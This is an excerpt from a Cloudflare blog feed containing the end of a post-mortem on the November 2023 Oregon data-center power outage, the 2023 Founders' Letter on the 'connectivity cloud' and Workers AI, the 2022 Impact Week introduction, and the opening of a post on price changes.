    <p>Cloudflare's control plane and analytics systems run primarily on servers in three data centers around Hillsboro, Oregon. The three data centers are independent of one another, each have multiple utility power feeds, and each have multiple redundant and independent network connections.</p><p>The facilities were intentionally chosen to be at a distance apart that would minimize the chances that a natural disaster would cause all three to be impacted, while still close enough that they could all run active-active redundant data clusters. This means that they are continuously syncing data between the three facilities. By design, if any of the facilities goes offline then the remaining ones are able to continue to operate.</p><p>This is a system design that we began implementing four years ago. While most of our critical control plane systems had been migrated to the high availability cluster, some services, especially for some newer products, had not yet been added to the high availability cluster.</p><p>In addition, our logging systems were intentionally not part of the high availability cluster. The logic of that decision was that logging was already a distributed problem where logs were queued at the edge of our network and then sent back to the core in Oregon (or another regional facility for customers using regional services for logging). If our logging facility was offline then analytics logs would queue at the edge of our network until it came back online. We determined that analytics being delayed was acceptable.</p>
    <div>
      <h3>Flexential Data Center Power Failure</h3>
      <a href="#flexential-data-center-power-failure">
        
      </a>
    </div>
    <p>The largest of the three facilities in Oregon is run by Flexential. We refer to this facility as “PDX-DC04”. Cloudflare leases space in PDX-04 where we house our largest analytics cluster as well as more than a third of the machines for our high availability cluster. It is also the default location for services that have not yet been onboarded onto our high availability cluster. We are a relatively large customer of the facility, consuming approximately 10 percent of its total capacity.</p><p>On November 2 at 08:50 UTC Portland General Electric (PGE), the utility company that services PDX-04, had an unplanned maintenance event affecting one of their independent power feeds into the building. That event shut down one feed into PDX-04. The data center has multiple feeds with some level of independence that can power the facility. However, Flexential powered up their generators to effectively supplement the feed that was down.</p><p>Counter to best practices, Flexential did not inform Cloudflare that they had failed over to generator power. None of our <a href="https://www.cloudflare.com/learning/performance/what-is-observability/">observability tools</a> were able to detect that the source of power had changed. Had they informed us, we would have stood up a team to monitor the facility closely and move control plane services that were dependent on that facility out while it was degraded.</p><p>It is also unusual that Flexential ran both the one remaining utility feed and the generators at the same time. It is not unusual for utilities to ask data centers to drop off the grid when power demands are high and run exclusively on generators. Flexential operates 10 generators, inclusive of redundant units, capable of supporting the facility at full load. It would also have been possible for Flexential to run the facility only from the remaining utility feed. We haven't gotten a clear answer why they ran utility power and generator power.</p>
    <div>
      <h3>Informed Speculation On What Happened Next</h3>
      <a href="#informed-speculation-on-what-happened-next">
        
      </a>
    </div>
    <p>From this decision onward, we don't yet have clarity from Flexential on the root cause or some of the decisions they made or the events. We will update this post as we get more information from Flexential, as well as PGE, on what happened. Some of what follows is informed speculation based on the most likely series of events as well as what individual Flexential employees have shared with us unofficially.</p><p>One possible reason they may have left the utility line running is because Flexential was part of a program with PGE called DSG. DSG allows the local utility to run a data center's generators to help supply additional power to the grid. In exchange, the power company helps maintain the generators and supplies fuel. We have been unable to locate any record of Flexential informing us about the DSG program. We've asked if DSG was active at the time and have not received an answer. We do not know if it contributed to the decisions that Flexential made, but it could explain why the utility line continued to remain online after the generators were started.</p><p>At approximately 11:40 UTC, there was a ground fault on a PGE transformer at PDX-04. We believe, but have not been able to get confirmation from Flexential or PGE, that this was the transformer that stepped down power from the grid for the second feed that was still running as it entered the data center. It seems likely, though we have not been able to confirm with Flexential or PGE, that the ground fault was caused by the unplanned maintenance PGE was performing that impacted the first feed. Or it was a very unlucky coincidence.</p><p>Ground faults with high voltage (12,470 volt) power lines are very bad. Electrical systems are designed to quickly shut down to prevent damage when one occurs. Unfortunately, in this case, the protective measure also shut down all of PDX-04’s generators. This meant that the two sources of power generation for the facility — both the redundant utility lines as well as the 10 generators — were offline.</p><p>Fortunately, in addition to the generators, PDX-04 also contains a bank of UPS batteries. These batteries are supposedly sufficient to power the facility for approximately 10 minutes. That time is meant to be enough to bridge the gap between the power going out and the generators automatically starting up. If Flexential could get the generators or a utility feed restored within 10 minutes then there would be no interruption. In reality, the batteries started to fail after only 4 minutes based on what we observed from our own equipment failing. And it took Flexential far longer than 10 minutes to get the generators restored.</p>
    <div>
      <h3>Attempting to Restore Power</h3>
      <a href="#attempting-to-restore-power">
        
      </a>
    </div>
    <p>While we haven't gotten official confirmation, we have been told by employees that three things hampered getting the generators back online. First, they needed to be physically accessed and manually restarted because of the way the ground fault had tripped circuits. Second, Flexential's access control system was not powered by the battery backups, so it was offline. And third, the overnight staffing at the site did not include an experienced operations or electrical expert — the overnight shift consisted of security and an unaccompanied technician who had only been on the job for a week.</p><p>Between 11:44 and 12:01 UTC, with the generators not fully restarted, the UPS batteries ran out of power and all customers of the data center lost power. Throughout this, Flexential never informed Cloudflare that there was any issue at the facility. We were first notified of issues in the data center when the two routers that connect the facility to the rest of the world went offline at 11:44 UTC. When we weren't able to reach the routers directly or through out-of-band management, we attempted to contact Flexential and dispatched our local team to physically travel to the facility. The first message to us from Flexential that they were experiencing an issue was at 12:28 UTC.</p><blockquote><p><i>We are currently experiencing an issue with power at our [PDX-04] that began at approximately 0500AM PT [12:00 UTC]. Engineers are actively working to resolve the issue and restore service. We will communicate progress every 30 minutes or as more information becomes available as to the estimated time to restore. Thank you for your patience and understanding.</i></p></blockquote>
    <div>
      <h3>Designing for Data Center Level Failure</h3>
      <a href="#designing-for-data-center-level-failure">
        
      </a>
    </div>
    <p>While the PDX-04’s design was certified Tier III before construction and is expected to provide high availability SLAs, we planned for the possibility that it could go offline. Even well-run facilities can have bad days. And we planned for that. What we expected would happen in that case is that our analytics would be offline, logs would be queued at the edge and delayed, and certain lower priority services that were not integrated into our high availability cluster would go offline temporarily until they could be restored at another facility.</p><p>The other two data centers running in the area would take over responsibility for the high availability cluster and keep critical services online. Generally that worked as planned. Unfortunately, we discovered that a subset of services that were supposed to be on the high availability cluster had dependencies on services exclusively running in PDX-04.</p><p>In particular, two critical services that process logs and power our analytics — Kafka and ClickHouse — were only available in PDX-04 but had services that depended on them that were running in the high availability cluster. Those dependencies shouldn’t have been so tight, should have failed more gracefully, and we should have caught them.</p><p>We had performed testing of our high availability cluster by taking each (and both) of the other two data center facilities entirely offline. And we had also tested taking the high availability portion of PDX-04 offline. However, we had never tested fully taking the entire PDX-04 facility offline. As a result, we had missed the importance of some of these dependencies on our data plane.</p><p>We were also far too lax about requiring new products and their associated databases to integrate with the high availability cluster. Cloudflare allows multiple teams to innovate quickly. As such, products often take different paths toward their initial alpha. While, over time, our practice is to migrate the backend for these services to our best practices, we did not formally require that before products were declared generally available (GA). That was a mistake as it meant that the redundancy protections we had in place worked inconsistently depending on the product.</p><p>Moreover, far too many of our services depend on the availability of our core facilities. While this is the way a lot of software services are created, it does not play to Cloudflare’s strength. We are good at distributed systems. Throughout this incident, our global network continued to perform as expected. While some of our products and features are configurable and serviceable through the edge of our network without needing the core, far too many today fail if the core is unavailable. We need to use the distributed systems products that we make available to all our customers for all our services, so they continue to function mostly as normal even if our core facilities are disrupted.</p>
    <div>
      <h3>Disaster Recovery</h3>
      <a href="#disaster-recovery">
        
      </a>
    </div>
    <p>At 12:48 UTC, Flexential was able to get the generators restarted. Power returned to portions of the facility. In order to not overwhelm the system, when power is restored to a data center it is typically done gradually by powering back on one circuit at a time. Like the circuit breakers in a residential home, each customer is serviced by redundant breakers. When Flexential attempted to power back up Cloudflare's circuits, the circuit breakers were discovered to be faulty. We don't know if the breakers failed due to the ground fault or some other surge as a result of the incident, or if they'd been bad before, and it was only discovered after they had been powered off.</p><p>Flexential began the process of replacing the failed breakers. That required them to source new breakers because more were bad than they had on hand in the facility. Because more services were offline than we expected, and because Flexential could not give us a time for restoration of our services, we made the call at 13:40 UTC to fail over to Cloudflare's disaster recovery sites located in Europe. Thankfully, we only needed to fail over a small percentage of Cloudflare’s overall control plane. Most of our services continued to run across our high availability systems across the two active core data centers.</p><p>We turned up the first services on the disaster recovery site at 13:43 UTC. Cloudflare's disaster recovery sites provide critical control plane services in the event of a disaster. While the disaster recovery site does not support some of our log processing services, it is designed to support the other portions of our control plane.</p><p>When services were turned up there, we experienced a thundering herd problem where the API calls that had been failing overwhelmed our services. We implemented rate limits to get the request volume under control. During this period, customers of most products would have seen intermittent errors when making modifications through our dashboard or API. By 17:57 UTC, the services that had been successfully moved to the disaster recovery site were stable and most customers were no longer directly impacted. However, some systems still required manual configuration (e.g., Magic WAN) and some other services, largely related to log processing and some bespoke APIs, remained unavailable until we were able to restore PDX-04.</p>
    <div>
      <h3>Some Products and Features Delayed Restart</h3>
      <a href="#some-products-and-features-delayed-restart">
        
      </a>
    </div>
    <p>A handful of products did not properly get stood up on our disaster recovery sites. These tended to be newer products where we had not fully implemented and tested a disaster recovery procedure. These included our Stream service for uploading new videos and some other services. Our team worked two simultaneous tracks to get these services restored: 1) reimplementing them on our disaster recovery sites; and 2) migrating them to our high-availability cluster.</p><p>Flexential replaced our failed circuit breakers, restored both utility feeds, and confirmed clean power at 22:48 UTC. Our team was all-hands-on-deck and had worked all day on the emergency, so I made the call that most of us should get some rest and start the move back to PDX-04 in the morning. That decision delayed our full recovery, but I believe made it less likely that we’d compound this situation with additional mistakes.</p><p>Beginning first thing on November 3, our team began restoring service in PDX-04. That began with physically booting our network gear then powering up thousands of servers and restoring their services. The state of our services in the data center was unknown as we believed multiple power cycles were likely to have occurred during the incident. Our only safe process to recover was to follow a complete bootstrap of the entire facility.</p><p>This involved a manual process of bringing our configuration management servers online to begin the restoration of the facility. Rebuilding these took 3 hours. From there, our team was able to bootstrap the rebuild of the rest of the servers that power our services. Each server took between 10 minutes and 2 hours to rebuild. While we were able to run this in parallel across multiple servers, there were inherent dependencies between services that required some to be brought back online in sequence.</p><p>Services are now fully restored as of November 4, 2023, at 04:25 UTC. For most customers, because we also store analytics in our European core data centers, you should see no data loss in most analytics across our dashboard and APIs. However, some datasets which are not replicated in the EU will have persistent gaps. For customers that use our log push feature, your logs will not have been processed for the majority of the event, so anything you did not receive will not be recovered.</p>
    <div>
      <h3>Lessons and Remediation</h3>
      <a href="#lessons-and-remediation">
        
      </a>
    </div>
    <p>We have a number of questions that we need answered from Flexential. But we also must expect that entire data centers may fail. Google has a process where when there’s a significant event or crisis they can call a Code Yellow or Code Red. In these cases, most or all engineering resources are shifted to addressing the issue at hand.</p><p>We have not had such a process in the past, but it’s clear today we need to implement a version of it ourselves: Code Orange. We are shifting all non-critical engineering functions to focusing on ensuring high reliability of our control plane. As part of that, we expect the following changes:</p><ul><li><p>Remove dependencies on our core data centers for control plane configuration of all services and move them wherever possible to be powered first by our distributed network</p></li><li><p>Ensure that the control plane running on the network continues to function even if all our core data centers are offline</p></li><li><p>Require that all products and features that are designated Generally Available must rely on the high availability cluster (if they rely on any of our core data centers), without having any software dependencies on specific facilities</p></li><li><p>Require all products and features that are designated Generally Available have a reliable disaster recovery plan that is tested</p></li><li><p>Test the blast radius of system failures and minimize the number of services that are impacted by a failure</p></li><li><p>Implement more rigorous chaos testing of all data center functions including the full removal of each of our core data center facilities</p></li><li><p>Thorough auditing of all core data centers and a plan to reaudit to ensure they comply with our standards</p></li><li><p>Logging and analytics disaster recovery plan that ensures no logs are dropped even in the case of a failure of all our core facilities</p></li></ul><p>As I said earlier, I am sorry and embarrassed for this incident and the pain that it caused our customers and our team. We have the right systems and procedures in place to be able to withstand even the cascading string of failures we saw at our data center provider, but we need to be more rigorous about enforcing that they are followed and tested for unknown dependencies. This will have my full attention and the attention of a large portion of our team through the balance of the year. And the pain from the last couple of days will make us better.</p> ]]></content:encoded>
            <category><![CDATA[Outage]]></category>
            <category><![CDATA[Post Mortem]]></category>
            <guid isPermaLink="false">73EdtHPXJkJx7fwtNqtJ2a</guid>
            <dc:creator>Matthew Prince</dc:creator>
        </item>
        <item>
            <title><![CDATA[Cloudflare’s 2023 Annual Founders’ Letter]]></title>
            <link>https://blog.cloudflare.com/cloudflares-annual-founders-letter-2023/</link>
            <pubDate>Wed, 27 Sep 2023 13:00:25 GMT</pubDate>
            <description><![CDATA[ Cloudflare is officially a teenager. We launched on September 27, 2010. Today we celebrate our thirteenth birthday ]]></description>
            <content:encoded><![CDATA[ <p></p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/67OiVANFpoXiW5HSigsJXf/daf80a65e1bcb4c51943f2377bd7cff4/Founders--Letter-2.png" />
            
            </figure><p>Cloudflare is officially a teenager. We launched on September 27, 2010. Today we celebrate our thirteenth birthday. As is our tradition, we use the week of our birthday to launch products that we think of as our gift back to the Internet. More on some of the incredible announcements in a second, but we wanted to start by talking about something more fundamental: our identity.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4fdonv6sU0NR22ONAvY8Nf/3a6a1d778beedf089e3693770f4489cc/Untitled-2.png" />
            
            </figure><p>Like many kids, it took us a while to fully understand who we are. We chafed at being put in boxes. People would describe Cloudflare as a security company, and we'd say, "That's not all we do." They'd say we were a network, and we'd object that we were so much more. Worst of all, they'd sometimes call us a "CDN," and we'd remind them that caching is a part of any sensibly designed system, but it shouldn't be a feature unto itself. Thank you very much.</p><p>And so, yesterday, the day before our thirteenth birthday, we announced to the world finally what we realized we are: a connectivity cloud.</p>
    <div>
      <h3>The connectivity cloud</h3>
      <a href="#the-connectivity-cloud">
        
      </a>
    </div>
    <p>What does that mean? "Connectivity" means we measure ourselves by connecting people and things together. Our job isn't to be the final destination for your data, but to help it move and flow. Any application, any data, anyone, anywhere, anytime — that's the essence of connectivity, and that’s always been the promise of the Internet.</p><p>"Cloud" means the batteries are included. It scales with you. It’s programmable. Has consistent security built in. It’s intelligent and learns from your usage and others' and optimizes for outcomes better than you ever could on your own.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5vtrLo5x2vMruQ6lphoUTm/9545282c61e0dd10d19830401c10c481/Untitled--1--1.png" />
            
            </figure><p>Our connectivity cloud is worth contrasting against some other clouds. The so-called hyperscale public clouds are, in many ways, the opposite. They optimize for hoarding your data. Locking it in. Making it difficult to move. They are captivity clouds. And, while they may be great for some things, their full potential will only truly be unlocked for customers when combined with a connectivity cloud that lets you mix and match the best of each of their features.</p>
    <div>
      <h3>Enabling the future</h3>
      <a href="#enabling-the-future">
        
      </a>
    </div>
    <p>That's what we're seeing from the hottest startups these days. Many of the leading AI companies are using Cloudflare's connectivity cloud to move their training data to wherever there's excess GPU capacity. We estimate that across the AI startup ecosystem, Cloudflare is the most commonly used cloud provider. Because, if you're building the future, you know connectivity and the agility of the cloud are key.</p><p>We've spent the last year listening to our AI customers and trying to understand what the future of AI will look like and how we can better help them build it. Today, we're releasing a series of products and features borne of those conversations and opening incredible new opportunities.</p><p>The biggest opportunity in <a href="https://www.cloudflare.com/learning/ai/what-is-artificial-intelligence/">AI</a> is inference. Inference is what happens when you type a prompt to write a poem about your love of connectivity clouds into ChatGPT and, seconds later, get a coherent response. Or when you run a search for a picture of your passport on your phone, and it immediately pulls it up.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3hZTnf3ox43UTTLSCoQYoi/b0958157538422c72ca13764af98c06e/Untitled--2--1.png" />
            
            </figure><p>The models that power those modern miracles take significant time to generate — a process called training. Once trained though, they can have new data fed through them over and over to generate valuable new output.</p>
    <div>
      <h3>Where inference happens</h3>
      <a href="#where-inference-happens">
        
      </a>
    </div>
    <p>Before today, those models could run in two places. The first was the end user's device — like in the case of the search for “passport” in the photos on your phone. When that's possible it's great. It's fast. Your private data stays local. And it works even when there's no network access. But it's also challenging. Models are big and the storage on your phone or other local device is limited. Moreover, putting the fastest GPU resources to process these models in your phone makes the phone expensive and burns precious battery resources.</p><p>The alternative has been the centralized public cloud. This is what’s used for a big model like OpenAI’s GPT-4, which runs services like ChatGPT. But that has its own challenges. Today, nearly all the GPU resources for AI are deployed in the US — a fact that rightfully troubles the rest of the world. As AI queries get more personal, sending them all to some centralized cloud is a potential security and data locality disaster waiting to happen. Moreover, it's inherently slow and less efficient and therefore more costly than running the inference locally.</p>
    <div>
      <h3>A third place for inference</h3>
      <a href="#a-third-place-for-inference">
        
      </a>
    </div>
    <p>Running on the device is too small. Running on the centralized public cloud is too far. It’s like the story of “Goldilocks and the Three Bears”: the right answer is somewhere in between. That's why today we're excited to be rolling out modern GPU resources across Cloudflare's global connectivity cloud. The third place for AI inference. Not too small. Not too far. The perfect step in between. By the end of the year, you'll be able to run AI models in more than 100 cities in 40+ countries where Cloudflare operates. By the end of 2024, we plan to have inference-tuned GPUs deployed in nearly every city that makes up Cloudflare's global network and within milliseconds of nearly every device connected to the Internet worldwide.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/fVvmxz6QyAagRfc7jnKlL/c5ee84b4149ace4a7d041fb34211892a/Untitled--3--1.png" />
            
            </figure><p>(A brief shout out for the Cloudflare team members who are, as of this moment, literally dragging suitcases full of NVIDIA GPU cards around the world and installing them in the servers that make up our network worldwide. It takes a lot of atoms to move all the bits that we do, and it takes intrepid people spanning the globe to update our network to facilitate these new capabilities.)</p><p>Running AI in a connectivity cloud like Cloudflare gives you the best of both worlds: nearly boundless resources running locally near any device connected to the Internet. And we've made it flexible to run whatever models a developer creates, easy to use without needing a dev ops team, and inexpensive to run where you only pay for when we're doing inference work for you.</p><p>To make this tangible, think about a Cloudflare customer that makes consumer wearable devices. They make devices that need to be smart but also affordable and have the longest possible battery life. As explorers rely on them literally to navigate out of harrowing conditions, tradeoffs aren't an option. That's why, when they heard about Cloudflare Workers AI, they immediately knew it was something they needed to try. The promise is powerful devices that are still affordable and have great battery life while still respecting users’ privacy and security.</p><p>They are one of the limited set of customers we gave an early sneak peek to, all of whom immediately started running off ideas of what they could do next and clamoring to get more access. We feel like we’ve seen it and are here to report: the not-so-distant future is super cool.</p>
    <div>
      <h3>The spirit of helping build a better Internet</h3>
      <a href="#the-spirit-of-helping-build-a-better-internet">
        
      </a>
    </div>
    <p>Over the years we've announced several things on our birthday that have gone on to change the future of the Internet. On our <a href="/introducing-cloudflares-automatic-ipv6-gatewa/">first birthday</a>, we announced an IPv6 gateway that has helped the Internet scale past its early protocol decisions. On our <a href="/introducing-universal-ssl/">fourth birthday</a>, we announced that we were making encryption free and doubled the size of the encrypted web in a day. On our <a href="/code-everywhere-cloudflare-workers/">seventh birthday</a>, we launched the Workers platform that has revolutionized how modern applications are developed. <a href="/introducing-r2-object-storage/">On our eleventh birthday</a> we announced R2 and further freed data from the captivity clouds.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2Zu0yp9b8e6WiwtsfH8GFM/607ec11c1efc0ffae173bcbc762957ee/Untitled--4--1.png" />
            
            </figure><p>This year, as we celebrate Cloudflare's thirteenth birthday, we set out to have as dramatic an impact on AI development as we have in other areas we've focused on in the past: providing tools that bring affordable, powerful AI inference to anyone, anywhere on Earth.</p>
    <div>
      <h3>Closing with a poem</h3>
      <a href="#closing-with-a-poem">
        
      </a>
    </div>
    <p>And so, to commemorate that, let's close with a poem about the connectivity cloud. This one was generated using a tiny bit of code and Meta's Llama 2 <a href="https://www.cloudflare.com/learning/ai/what-is-large-language-model/">LLM model</a> running on Cloudflare's Workers AI platform in a data center not far from where we're writing this…</p><p><code><i>Prompt: “Write a poem that talks about the connectivity cloud and contrast it with the captivity cloud”</i></code></p><p>The connectivity cloud, a wondrous sight to see,</p><p>Where data flows and knowledge is set free,</p><p>A place where minds meet and ideas take flight,</p><p>A world of endless possibility in sight.</p><p></p><p>But then there's the captivity cloud, a darker place,</p><p>Where thoughts are trapped and minds are in disgrace,</p><p>A prison of the mind, where freedom's lost,</p><p>A world of endless sorrow and cost.</p><p></p><p>So let us choose the connectivity cloud,</p><p>And let our minds be free and allowed,</p><p>To soar and glide and reach for the sky,</p><p>And never be held back, but always fly.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3aZzQ7Vw4G69UGP0rGcepY/91eb15cde2fd66f58e36a4306c039ff6/Screenshot-2023-09-27-at-09.54.04.png" />
            
            </figure>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6SI9dzaeXO0iBoPxQNDdh5/4230708aaf9a2d74dac2688aa0cd150a/Untitled--5-.png" />
            
            </figure><p></p> ]]></content:encoded>
            <category><![CDATA[Birthday Week]]></category>
            <category><![CDATA[Connectivity Cloud]]></category>
            <category><![CDATA[Founders' Letter]]></category>
            <category><![CDATA[Better Internet]]></category>
            <guid isPermaLink="false">3lnlO41gonF28Yk7CXzzno</guid>
            <dc:creator>Matthew Prince</dc:creator>
            <dc:creator>Michelle Zatlyn</dc:creator>
        </item>
        <item>
            <title><![CDATA[Welcome to Cloudflare’s Impact Week]]></title>
            <link>https://blog.cloudflare.com/welcome-to-cloudflares-impact-week/</link>
            <pubDate>Sun, 11 Dec 2022 18:00:00 GMT</pubDate>
            <description><![CDATA[ Over the course of this Impact Week, we will tell other stories about the way that the Internet, and Cloudflare specifically, provide an optimistic opportunity to improve our world. ]]></description>
            <content:encoded><![CDATA[ <p><i></i></p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6P7kxCjohuuoRRevo5uGon/c8feab6046fbd17d976d2debc5dbbbb9/h9oHzv3QUccPIAFIfbtXVq-P9jkzOwimOOe4SrnduXxcDDwD0qQdLaANVQRW-leDWmxZyNbh8ZBWnJHXQ68HAdz0HDdgetirqpze-7pQIn6UrWE4Pgk1-GPBnFJi.png" />
            
            </figure><p>In the early days of Cloudflare, we made it a policy that every new hire had to interview with either me or my co-founder Michelle. It’s still the case today, though we now have more than 3,000 employees, continue to hire great people as we find them, and, because there are only so many hours in the day, have had to enlist a few more senior executives to help with these final calls.</p><p>At first, these calls were about helping screen for new members of our small team. But, as our team grew, the purpose of these calls changed. Today, by the time I do the final call with someone we’ve made the decision to hire them, so it’s rarely about screening. Instead, the primary purpose is to make sure everyone joining has had a positive conversation with a senior member of our team, so if in the future they ever see something going wrong they’ll hopefully feel a bit more comfortable letting one of us know. I think because of that these calls are some of the most important work I do.</p><p>But, for me, there’s another purpose. I get to hear first-hand why people chose to apply. That’s a barometer for what we’re doing right, evaluated by someone with a perspective outside the organization. And, nearly every day, I hear some version of the same thing: the most consistent reason new employees want to join Cloudflare is because of our mission and the breadth of our impact.</p><p>Our team wants the work they do to have a real, positive impact for the millions of users of our services and the billions of Internet users our decisions affect downstream. It makes me smile every time someone we’re about to extend an offer to says something along the lines of “when Cloudflare pushes a new feature or product, you’re changing the entire Internet for the better. And I want to be part of that.” That’s why I continue to be excited about my job too.</p><p>It may seem like our mission to “help build a better Internet” has been around forever, but it wasn’t something we had at the beginning. It developed as the natural outgrowth of the team we assembled and the products we built. Today, it’s integral to Cloudflare’s DNA. Our team has always been optimistic about the Internet and its potential to do good, especially if it is founded on respect for certain values like security, privacy, interoperability, and wide availability.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5hl527omNh9R0EA4dsP0xt/f7a52a52ebe67e8ceccd9958bb1183b3/image2-12.png" />
            
            </figure><p>That’s why the focus on privacy over the past few years was always easy for us. We never sold customer data to marketers — that just didn’t seem like what would be a part of a better Internet — so when it came time to comply with new privacy laws, we didn’t have to pull back operations or cut off lines of revenue. Instead, we rolled out the use of <a href="/introducing-universal-ssl/">Universal SSL</a> to expand encryption broadly for the Internet, and we created our first consumer-facing product, <a href="/announcing-1111/">a privacy-first DNS resolver.</a></p><p>As we kick off this year’s Impact Week, we certainly see a number of challenges for the Internet, though we think the opportunities for the Internet continue to far outweigh those challenges. Around the world, we see a number of countries rejecting the opportunity to maximize the potential of the Internet, and instead, passing new laws and regulations seeking to assert narrow control of the Internet for their own self-interested purposes, including in some cases for things like commercial advantage, censorship, or surveillance.</p><p>For example, around the Russian invasion of Ukraine, we’ve seen the Russian government launch cyberattacks and use targeted Internet outages to further torment the people in Ukraine, while at the same time pressing citizens in Russia to only use Internet tools and view information controlled by the Russian government.</p><p>Yet for all those challenges, we saw a disparate group of people and companies, including Cloudflare, come together to defend Ukraine from these attacks and do everything in their power to get the Internet back online as soon as possible. Nearly a year into the war, and despite the relentless efforts of a very powerful nation, the Internet remains a positive force for good in Ukraine, a way for them to get the message out about the horrific actions of the Russian government, and a tool for dissidents inside Russia to <a href="/what-cloudflare-is-doing-to-keep-the-open-internet-flowing-into-russia-and-keep-attacks-from-getting-out/">escape the attempted grip</a> of censorship. When Russia <a href="https://www.mid.ru/ru/maps/us/1814243/">personally sanctioned me</a> earlier this year I took it as a badge of honor we were doing something right.</p><p>At the same time, the promise of the Internet continues to bring increased opportunity, especially in still developing parts of the world. Increased access to reliable and secure Internet in those countries will enable education, healthcare, and commerce in ways humanity has been struggling to advance for decades.</p><p>And we’ve seen recently in Iran that the Internet remains the leading tool for liberation for oppressed voices who seek to shake the control of authoritarian governments. This led to the somewhat unusual step by the US government of <a href="https://home.treasury.gov/news/press-releases/jy0974">relaxing some of the sanctions</a> against Iran in order to permit companies like Cloudflare greater freedom to ensure that the general population in Iran can have access to the Internet to support their cause.</p><p>Although issues like war, oppression, and misinformation are as old as humanity itself, the Internet is novel in its ability to bring together marginalized people who previously were unable to find and engage with each other based on distance, repression, or resources. To make sure the Internet fulfills that part of its promise, Project Galileo celebrated its 8th anniversary this year, and continues to support groups that unite <a href="https://www.cloudflare.com/case-studies/dream-girl-foundation/">underprivileged girls in India</a>, the <a href="https://www.cloudflare.com/case-studies/bedayaa/">LGBTQIA+ community in the Nile River Valley</a>, <a href="https://www.cloudflare.com/case-studies/hera-digital-health/">refugees needing health care services in a private environment</a>. In total, through Project Galileo we provide Cloudflare’s services for free to more than 2,100 organizations in over 100 countries. That’s some of the work I’m the most proud of.</p><p>Over the course of this Impact Week, we will tell other stories about the way that the Internet, and Cloudflare specifically, provide an optimistic opportunity to improve our world. And that includes the entire world, especially as the Internet is poised to further close the gaps that have existed in Internet services to the developing world since its founding.</p><p>We will describe the way Cloudflare is focused on our own impact through emissions and the lessons we are applying to our products and operations to make sure that we are being responsible stewards of the Earth’s resources. We will review the ways that we are working to ensure that the necessary resources needed to benefit from the Internet aren’t limited to large companies with big budgets and the resources to buy the best tools.</p><p>From individuals and small businesses, to nonprofits and other community organizations, we want to make sure that the costs of cybersecurity and reliability don’t exclude those poised to benefit the most from the Internet. Specifically this year, we’re focused on making sure that sensitive groups — including local governments and <a href="https://www.cloudflare.com/the-net/government/critical-infrastructure/">critical infrastructure</a> — are benefiting from new <a href="https://www.cloudflare.com/learning/security/glossary/what-is-zero-trust/">Zero Trust</a> tools that are increasingly necessary for all organizations.</p><p>At the end of the week, we’ll release our annual Impact Report that provides a comprehensive review of our approach to these issues, especially when it comes to sustainability and ensuring that the Internet remains a widely-available and principled place.</p><p>We take pride in the principles that lie at the core of what we do as a company. Although many of us wake up every day scanning the Internet for the latest cyberattacks that we have to address or the latest congestion on the Internet to relieve, we are energized by the Internet's ongoing promise to make life better for billions of people. This Impact Week we get to wake up and focus on those stories and share with you why all of us are here. We hope you are as excited as we are.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4vg83UwgV7TcMKneJgzSoB/2919eabed312b3c91c254f3b5c9604ad/image3-5.png" />
            
            </figure><p></p> ]]></content:encoded>
            <category><![CDATA[Impact Week]]></category>
            <guid isPermaLink="false">36v1S0XQQS7NqAeBhXTNU7</guid>
            <dc:creator>Matthew Prince</dc:creator>
        </item>
        <item>
            <title><![CDATA[Adjusting pricing, introducing annual plans, and accelerating innovation]]></title>
            <link>https://blog.cloudflare.com/adjusting-pricing-introducing-annual-plans-and-accelerating-innovation/</link>
            <pubDate>Wed, 30 Nov 2022 01:04:42 GMT</pubDate>
            <description><![CDATA[ After not raising prices in our history, this was something we thought carefully about before deciding to do. While we have over a decade of network expansion and innovation under our belts, what may not be intuitive is that our goal is not to increase revenue from this change. ]]></description>
            <content:encoded><![CDATA[ <p><i></i></p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3bMRFknJOVEMt7n6ia7QgR/96bc3388155727714c2e69f953adae1f/Adjusting-pricing--introducing-annual-plans--accelarating-innovation-2.png" />
            
            </figure><p>Cloudflare is raising prices for the first time in the last 12 years. Beginning January 15, 2023, new sign-ups will be charged \$25 per month for our Pro Plan (up from \$20 per month) and \$250 per month for our Business Plan (up from \$200 per month). Any paying customers who sign up before January 15, 2023, including any currently paying customers who signed up at any point over the last 12 years, will stay at the old monthly price until May 14, 2023.</p><p>We are also introducing an option to pay annually, rather than monthly, that we hope most customers will choose to switch to. Annual plans are available today and discounted from the new monthly rate to \$240 per year for the Pro Plan (the equivalent of \$20 per month, saving \$60 per year) and \$2,400 per year for the Business Plan (the equivalent of \$200 per month, saving \$600 per year). In other words, if you choose to pay annually for Cloudflare you can lock in our old monthly prices.</p><p>After not raising prices in our history, this was something we thought carefully about before deciding to do. While we have over a decade of network expansion and innovation under our belts, what may not be intuitive is that our goal is not to increase revenue from this change. We need to invest up front in building out our network, and the main reason we're making this change is to more closely map our business with the timing of our underlying costs. Doing so will enable us to further accelerate our network expansion and pace of innovation — which all of our customers will benefit from. Since this is a big change for us, I wanted to take the time to walk through how we came to this decision.</p>
    <div>
      <h3>Cloudflare's history</h3>
      <a href="#cloudflares-history">
        
      </a>
    </div>
    <p>Cloudflare launched on September 27, 2010. At the time we had two plans: one Free Plan that was free, and a Pro Plan that cost $20 per month. Our network at the time consisted of "four and a half" data centers: Chicago, Illinois; Ashburn, Virginia; San Jose, California; Amsterdam, Netherlands; and Tokyo, Japan. The routing to Tokyo was so flaky that we'd turn it off for half the day to not mess up routing around the rest of the world. The biggest difference for the first couple years between our Free and Pro Plans was that only the latter included HTTPS support.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/59jZ5cRvEwI47IqJRnd7Yo/63073aac5fb30abf3c8f7c143be4687c/image4-34.png" />
            
